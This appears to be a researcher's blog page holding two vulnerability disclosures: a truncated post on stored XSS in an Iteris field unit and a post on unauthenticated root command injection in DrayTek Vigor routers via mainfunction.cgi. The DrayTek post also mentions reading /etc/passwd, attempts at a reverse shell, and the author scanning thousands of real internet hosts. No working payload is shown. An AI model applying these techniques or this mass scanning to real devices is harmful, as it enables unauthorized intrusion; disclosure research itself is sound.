Sunday, January 26, 2020

[ITERIS] - Vantage Velocity Field Unit - Multiple Stored XSS vulnerabilities - (CVE-2020-9025)

I continue with the research on ITERIS devices, in this case on the same "Vantage Velocity Field Unit". This time, I started placing some requests by injecting one or another javascript code to see what was coming out.

I found that in the "" function that I only found in version 2.4.2 devices, I can inject malicious code into several of its parameters and can do XSS attacks. The most interesting thing is that the XSS that was found is stored, which makes it even better. In addition, on this function, there is a button called "Star Data Viewver", which is the one I used for the XSS. however , in the request sent the credentials of the admin of the device are shown, which at no time I have used, since the device does not ask for passwords, which I found curious.

First of all we go to the URL "http://SERVER_IP:8089/cgi-bin/"

[DrayTek] - Unauthenticated RCE in Draytek Vigor 2960, 3900 and 300B (CVE-2020-8515)

DrayTek is a manufacturer of Firewalls, VPN Devices , Routers, WLAN devices, etc, based in China.Investigating on different network devices I found that there's a device model named Vigor 2960 (no, it's not a switch as the Cisco one). The Draytek Vigor 2960 is a High-Performance Dual-Wan Load Balancing Router & VPN Gateway.

When you try to authenticate, this device sends a POST request to mainfunction.cgi with different parameters.

Now, what if we try adding in every parameter any escape character?, after a few tries , trying to execute the pwd command, it was possible. 

After executing the command, I was thinking on how to escalate privileges, but this was a surprise. After running the command id, i though that the answer was going to be "www-data" or something related, but it was root!.

Here are more example of differents commands executed.
ups! /etc/passwd ;) 

Right now Im working on the reverse shell thing, because the commands executed are being parsed by the mainfunction.cgi. Is a little bit tricky to get a reverse shell with a command without spaces. Sed is replacing the spaces with "+".

But I'm concern of something more important than that. If you go to right now, and search for "Draytek" only, you'll find 710,029 hosts!.

If you search for the Vigor 2960 model, you'll have 15,429 host.

All of this host are vulnerable?. Let's find out.

After a few hours I created a python script to check if a list of IPs is vulnerable to this RCE. So, after exporting all the results for Vigor 2960, and a few hours later, all the hosts were tested.


3593 are vulnerable!, and I'm 100% sure that the vulnerable hosts are more, because of the timeout parameter configured in the requests.
And that's not all! 

This vulnerability is fully compatible also for the DrayTek Vigor 3900 and 300B!.

Draytek Vigor 3900

Draytek 300B

This device is not a VPN device as the others, this is a Loadbalancer.

Until now, what version/firmware was detected as vulnerable?

  •  Vigor2960
    • 1.3.1_Beta
  • Vigor3900
    • 1.4.4_Beta
  • Vigor300B
  • 1.4.4_Beta
  • 1.3.3_Beta
CVE: CVE-2020-8515

By @mpx0